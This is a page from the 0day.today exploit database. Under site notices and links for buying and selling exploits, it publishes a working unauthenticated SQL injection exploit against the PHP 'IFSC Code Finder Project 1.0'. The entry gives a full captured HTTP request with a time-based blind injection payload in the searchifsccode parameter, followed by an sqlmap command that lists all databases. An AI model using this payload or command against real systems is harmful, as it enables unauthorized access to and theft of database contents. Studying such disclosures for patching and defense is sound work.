0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
IFSC Code Finder Project 1.0 - SQL injection (Unauthenticated) Vulnerability
# Title: IFSC Code Finder Project 1.0 - SQL injection (Unauthenticated) # Exploit Author: Yash Mahajan # Vendor Homepage: https://phpgurukul.com/ifsc-code-finder-project-using-php/ # Version: 1 # Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=14478 # Tested On: Windows 10, XAMPP # Vulnerable Parameter: searchifsccode Steps to Reproduce: 1) Navigate to http://127.0.0.1/ifscfinder/ enter any number in search field and capture request in burpsuite. 2) Paste below request into burp repeater and also create a txt file and paste this request. Request: ======== POST /ifscfinder/search.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 79 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/ifscfinder/ Cookie: PHPSESSID=5877lg2kv4vm0n5sb8e1eb0d0k Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 searchifsccode=')+AND+(SELECT+3757+FROM+(SELECT(SLEEP(20)))lygy)--+fvnT&search= -------------------------------------------------------------------------------- 3) You will see a time delay of 20 Sec in response. 4) python sqlmap.py -r request.txt -p searchifsccode --dbs 5) We can retrieve all databases using above sqlmap command # 0day.today [2024-11-14] #